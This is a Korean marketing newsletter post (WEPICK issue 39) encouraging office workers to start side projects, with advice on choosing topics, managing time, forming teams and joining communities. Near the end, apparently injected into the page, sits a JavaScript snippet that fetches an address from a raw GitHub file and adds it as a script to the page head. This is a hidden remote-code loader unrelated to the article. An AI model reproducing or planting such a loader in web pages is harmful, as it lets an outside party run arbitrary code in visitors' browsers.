회사 다니면서 사이드 프로젝트하고 계시나요?

성장을 위한 나만의 사이드 프로젝트 만들기!?
위픽코퍼레이션
2022-07-27

?제 39호 2022년 04월 27일

구독자님, 회사라는 울타리를 넘어 업무 경험을 더 확장하고 싶지 않으신가요? 지금 당장 사이드 프로젝트를 시작해보세요! 개인의 발전과 자아실현을 위해서 사이드 프로젝트를 시작하는 것은 매우 유의미한 일입니다. 목표를 세우고 달성하기 위해 노력을 하는 것은 큰 성취감을 주죠. 나를 위한 가치 창출 활동이에요!?

출처: 센과 치히로의 행방불명 ‘가오나시’

위 사진처럼 파도같은 시간에 잡아먹히지 말고 개인의 발전과 자아실현을 위해 사이드 프로젝트를 시작해야함.

그럼 발 담그기 전 어떤 주제로 프로젝트를 시작해야 할지 막막하실 거예요. 지금부터 내가 즐거워서 하는 사이드 프로젝트, 어떻게 시작하고 실행 후 어떤 효과가 있을지 알려드릴게요.

구독자 님은 사이드 프로젝트를 왜 하시나요?기술을 체득하여 회사에서 전문성을 강화하기 위해서 일수도 있고, 혹은 다른 이유일 수도 있어요. 사이드 프로젝트는 시작하기 전 목적성을 명확히 하는 게 중요합니다! 그래야 중간에 포기하지 않고 끝까지 목표를 달성할 수 있죠! 결심을 단단히 했다면 어떤 주제로 사이드 프로젝트를 하면 좋을까요??

✅ 덕업일치! 자신의 취향이나 관심사에 주목하자!

여러분이 잘하는 것과 좋아하는 것을 기반으로 가볍게 사이드 프로젝트 주제를 생각해보세요! 여러가지 프로젝트를 만들어 나갈 수 있습니다. 좋아하는 것이 ‘서핑’?‍♂️ 이라면 사이드 프로젝트로 서핑을 위한 온라인 서비스 기획을 해보는 거죠!

출처: 유튜브 eo, 퇴근 후 딴짓 효과, 개발자 이상욱 님은 좋아하는 ‘서핑’ 등 다양한 사이드 프로젝트를 함.

혹은 부담 없이 가볍게 시작할 수 있는 활동도 괜찮습니다! ‘인스타그램’을 좋아하면 인스타그램 계정을 직접 브랜딩 해볼 수 있고요. 여러분도 자신의 취향이나 관심사를 돌아보고 프로젝트에 접목해 보세요! 아이템 선정이 어렵진 않을거에요.

관심 있는 분야라면 더 의미 있고 재미있게 일 할 수 있겠죠? 시작부터 새로운 것을 발굴하기 보다는 지금 하고 있는 것과 연결해서 진행해보세요!

출처: 짱구는 못말려, 사이드 프로젝트와 본업의 시간과 에너지가 불균형하면 위 사진처럼 되려 피곤해진다.

그래서 가장 중요한 포인트는 내가 하루에 해낼 수 있는 양적, 질적 기준을 명확히 세우는 것입니다. 무리해서 따로 시간을 내지 말고, 출퇴근 시간처럼 자투리 시간을 활용하세요! SNS 운영을 하는 사이드 프로젝트라면 게시물 카피 구상은 출근 시간에! 이미지 촬영 및 영상 촬영은 퇴근시간에! 하는 것이죠.

목표를 너무 높게 혹은 너무 낮게도 잡지 말아야 쉽게 지치지 않습니다. 꾸준히 할 수 있는 부담 없는 선에서 내가 지킬 수 있는 원칙을 만드는 거예요. 초반에는 어떻게 시간⏰을 효율적으로 쓸 수 있는지를 다양하게 조정해보고 충분히 고민하세요. 그럼 여러분의 페이스에 맞는 균형점을 찾을 수 있을 겁니다!

✅ 내가 좋아하는 팀을 꾸리자

첫 번커뮤니케이션 할 수 있는 동반자가 있는 것도 성장과 동기부여에 도움이 됩니다! 혼자 프로젝트를 하다 보면 동기부여가 사라져 점점 의욕이 떨어질 수도 있어요. (현타….) 혹은 혼자서는 하기 힘든 분야가 있을 수 있죠.

같이 일했을 때 서로의 강점과 케미??‍?‍??가 돋보이는 친구를 찾아보세요! 최고의 파트너는 나한테 없는 것을 가진 사람입니다. 나의 부족한 점을 상대가 어떻게 보완할 것인지 내가 상대를 어떻게 보완할 것인지를 먼저 고민하세요!

사이드 프로젝트가 ‘마케팅 인사이트 계정 운영하기’ 라고 예를 들어봅시다. ‘구독자’님은 마케팅 진행 프로세스를 명확히 알고 있어 광고 운영에 뛰어나요. 반면 친구 A는 영상 및 이미지 촬영 및 편집에 뛰어납니다. 그리고 친구 B는 사람들을 이목 집중시키는 카피라이팅 실력을 가지고 있어요.

그럼 과연 이 3명이 뭉치면 어떤 일이 일어날까요? 혼자서는 하기 힘들던 일을 적절히 분담해 각자의 위치에서 잘 하는 일을 해낼 수 있습니다! 서로의 단점을 장점으로 상호 보완하며 시너지✨를 낼 수 있고, 또 잘해야겠다는 책임감도 생기겠죠?

사이드 프로젝트에 관심있는 친구를 못 찾으시겠다고요? 걱정 마세요! 같이 일할 수 있는 동료는 여러분 가까이에 있습니다. 회사 내 혹은 커뮤니티를 활용해 함께 할 수 있는 상대를 찾아보세요! 사이드 프로젝트를 함께할 팀원을 구하기 좋은 커뮤니티를 추천해드릴게요!

?홀릭스 (HOLIX)

출처: 홀릭스

홀릭스는 혼자가 아닌 각 분야 최고의 조력자, 랜선 사수의 도움을 받아 멘토와 함께 성장하는 지식 커뮤니티입니다. 홀릭스에는 궁금한 분야의 다양한 오픈채팅방이 있습니다. 오픈 채팅에 들어가서 원하는 분야의 전문가와 그 분야에 관심있는 사람들을 만나보세요. 모르는 것은 물어보고 소통하다 보면 프로젝트에 의견이 맞는 사람들을 찾을 수 있을 거예요!

?청년마케터

출처: 청년 마케터 공식 페이스북

직장인 커뮤니티 청년마케터는 2030 사회초년생을 대상으로 마케팅 세미나, 직무 스터디, 전문가 인터뷰를 진행하고 있는데요. 월간모임에서 외부초청 전문가의 강연을 닫고 분야별 마케터분들과 소통하실 수 있어요!

또한 관심있는 분야의 스터디를 선택하고 그 안에서 마음이 맞는 파트너를 찾으세요. 마케터로서 시각의 성장과 더불어 다방면의 사람들과 네트워킹을 할 수 있습니다.

기록을 쌓으면 나만의 콘텐츠 get!

출처: 미니인턴 <해피폴리오>

커리어나 취업 경험에 대해 자세히 얘기 나눌 사람이 없어 답답했던 경험, 다들 한번쯤 있으실거에요. 미니인턴 해피폴리오를 활용해서 그 정보를 쉽게 주고 받을 수 있습니다! 미니인턴의 ‘해피폴리오’는 취업 경험이 있는 사람이라면 누구나 자신의 이야기로 전차책? 형식의 콘텐츠를 만들어 판매할 수 있는 서비스인데요. 이 사이트에서는 다른 무엇이 아닌 ‘나의 취업 경험과 커리어’를 중심으로 이야기를 전개할 수 있다는 점이 독특합니다!

단순히 수익창출이 목표가 아니라, 스스로 커리어를 쌓는 과정에서 어떻게 시작하게 되었는지, 어떤 방식으로 위기를 헤쳐 나갔는지 자세하게 전달하며 누군가의 ‘가장 가까운 취업 선배’가 될 수 있다는 점에서 굉장히 매력적인데요. 현재 구직이나 이직을 준비중인 분들은 취업 꿀팁도 얻을 수 있겠네요!

출처:인스타그램 ‘힐다 마케팅’ 게시물

출처: 인사이트 공유 인스타그램 계정 ‘마글’, ‘인싸노트’, ‘브랜드 만드는 남자’, ‘오늘의 마케팅 인사이트’

일상의 작은 실천도 괜찮습니다! 마케팅 인사이트 인스타그램 계정을 운영해보세요! 인스타그램에 인사이트를 하나하나 꾸준히 기록하다보면, 그것이 하나의 포트폴리오가 될 수 있습니다! 최근에 이런 마케팅 인사이트를 아카이빙 하는 계정들이 많이 생겨나고 있어요!

출처: 무한도전, 돈벌기는 힘들지만 사이드 프로젝트를 하면서 더 뚜렷한 미래를 만들어 나갈 수있음.

✅ 본업과 시너지 효과는 덤!

내 특기와 장점을 이용해서 지속적으로 프로젝트를 하게 된다면, 이를 통해 배우게 된 능력을 본업에서도 효과적으로 적용할 수 있습니다. 새로운 아이디어를 꺼낼 수 있는 단서가 되거나, 이전에는 몰랐던 업무를 처리할 수 있는 능력까지 생길 수 있습니다.

서비스 기획자가 사이드 프로젝트로 ‘하루 10분 디자인 강연 듣기’를 하면서 UX 디자인에 대해 습득했다고 가정해봅시다! 회사에 갔을 때 관련된 문제상황에 부딪히면 그 능력이 문제해결에 도움이 될 수 있겠죠? 본업에 리스크를 최소화하면서도, 커리어에 도움이 될 만한 시도를 할 수 있다는 점에서 나를 위한 투자가 될 겁니다.

✅ ‘나’를 알아가는 과정

구독자님이 가장 좋아하는 일, 시간 가는 줄 모르고 할 수 있는 일은 무엇인가요? 좋아하는 일을 사이드 프로젝트로 하면 나를 보다 명확하게 알 수 있습니다. 사이드 프로젝트가 ‘디자이너로 일하면서 얻게 된 인사이트를 정리하여 퍼블리에 업로드 하기’ 라면 나의 글을 통해 새로운 정보를 사람들에게 공유하는 것을 좋아하는 사람이라는 것을 알 수 있어요.

혹은 ‘사진 아카이빙 홈페이지 운영’ 이라면 사진 촬영에 관심이 있는 나를 발견하고, 나의 취향과 감각에 대해서도 생각해 볼 수 있겠죠. 내가 무엇을 좋아하는지 무엇을 싫어하는지를 알게 되고 실행하다 보면 ‘나’의 새로운 능력을 발굴할 수 있습니다!✨

[출처] [위픽레터 39호]? 회사 다니면서 사이드 프로젝트하고 계시나요?|작성자 위픽 WEPICK

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)
위픽코퍼레이션의 글 더보기
Elementor #4352262
? 디자인 맛집으로 소문난 이 곳!
애니메이션에 녹아 든 '아시아나 항공'의 맥주 마케팅
무아인, 버추얼 인플루언서의 등장?
'대한민국'을 응원하는 '박카스'의 한마디
세상에서 가장 조용한 CM송, 해태 부라보콘 광고 털기?
마케팅트렌드 더보기
애니메이션에 녹아 든 '아시아나 항공'의 맥주 마케팅
무아인, 버추얼 인플루언서의 등장?
'대한민국'을 응원하는 '박카스'의 한마디
세상에서 가장 조용한 CM송, 해태 부라보콘 광고 털기?
?신입의 고민을 들어주세요!??
? 변화된 삶에 대처하라! 새로운 여행 마케팅

4335184 인기 이벤트

댓글

링크복사

페이스북

카카오톡